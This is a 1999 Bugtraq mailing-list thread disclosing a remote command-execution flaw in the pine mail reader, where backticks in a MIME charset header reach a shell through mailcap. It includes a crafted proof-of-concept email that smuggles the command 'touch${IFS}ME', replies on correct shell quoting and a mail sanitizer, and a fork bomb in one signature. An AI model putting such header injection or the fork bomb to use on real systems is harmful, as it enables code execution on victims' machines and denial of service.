Date: Mon, 8 Feb 1999 00:22:17 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: remote exploit on pine 4.10 - neverending story?

Affected systems:
-----------------

  Any Un*x system running 'pine' up to version 4.10 (latest).

Compromise:
-----------

  Remote execution of arbitrary code when a message is viewed.

Details:
--------

  About five months ago, I reported a vulnerability in the metamail package used
  with pine. I also noticed that the '`' character is incorrectly expanded by
  pine. The problem has been ignored (probably no one understood what I was
  talking about?;-). But no matter. An excerpt from /etc/mailcap:

  text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput

Impact:
-------

  And now, ladies and gentlemen - my old bug, reinvented. Usually, the above
  mailcap line is expanded to:

  [...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'
        '[a-z]'`" = iso-8859-1)

  Hmm, but take a look at this message:

************************** MIME MESSAGE FOLLOWS **************************
From: Attacker <attacker@eleet.net>
To: Victim <victim@somewhere.net>
Subject: Happy birthday
...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'

Make a wish...

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"

...it could be your last.
*************************** MIME MESSAGE ENDS ***************************

  The result is:

  [...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr
        '[A-Z]' '[a-z]'`" = iso-8859-1)

  ...and arbitrary code ('touch ME', encoded using the ${IFS} trick) is
  executed when the message is viewed.

Fix:
----

  Well, it's the second time I have reported problems with ` in headers.
  Maybe the pine developers should wait a little longer ;-)

_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
To iterate is human, to recurse divine [P. Deutsch]

-------------------------------------------------------------------------

Date: Mon, 8 Feb 1999 18:13:53 +0100
From: Thomas Roessler <roessler@GUUG.DE>
To: BUGTRAQ@netspace.org
Subject: Re: remote exploit on pine 4.10 - neverending story?

This bug exhibits a general mailcap design problem, actually some
apparent lack of clarity in RFC 1524: The mailcap format
specification does not define where quoting takes place.  As a
result, users tend to do quoting manually using constructs like
"%..." or '%...'.  Software tends not to do _any_ quoting of its
own.

Why this means begging for disaster is obvious: Attackers can
construct strings with appropriate shell metacharacters to trick
users into executing arbitrary shell commands - just like Michal
demonstrated for this special case.

The only proper solution is that users MUST NOT perform any quoting
on their own in mailcap files, and that software MUST perform proper
shell quoting when expanding the %{something} strings.  "Proper
shell quoting" means to put the complete string into single quotes
and to replace any ' inside the string by the sequence of characters
'\''.  (Note that this is already in some Unix programming FAQ.)

"Simply" trying to escape or wipe out shell metacharacters will also
be a recipe for problems.  Think about certain bash versions'
handling of (as far as I recall) \xff as a word separator.

tlr
--
Thomas Roessler · 74a353cc0b19 · dg1ktr · http://home.pages.de/~roessler/
     2048/CE6AC6C1 · 4E 04 F0 BC 72 FF 14 23 44 85 D1 A1 3B B0 73 C1

-------------------------------------------------------------------------

Date: Mon, 8 Feb 1999 09:25:11 -0800
From: John D. Hardin <jhardin@WOLFENET.COM>
To: BUGTRAQ@netspace.org
Subject: Re: remote exploit on pine 4.10 - neverending story?


Okay, I have added `` -> " conversion to my procmail MIME sanitizer.

Michal, is that the only way to exploit this? Or should there be ` ->
' conversion as well?

See http://www.wolfenet.com/~jhardin/procmail-security.html for
details.

--
 John Hardin KA7OHZ                               jhardin@wolfenet.com
 pgpk -a finger://gonzo.wolfenet.com/jhardin    PGP key ID: 0x41EA94F5
 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
  Your mouse has moved. Windows NT must be restarted for the change
  to take effect. Reboot now?  [ OK ]
-----------------------------------------------------------------------
   101 days until Star Wars episode I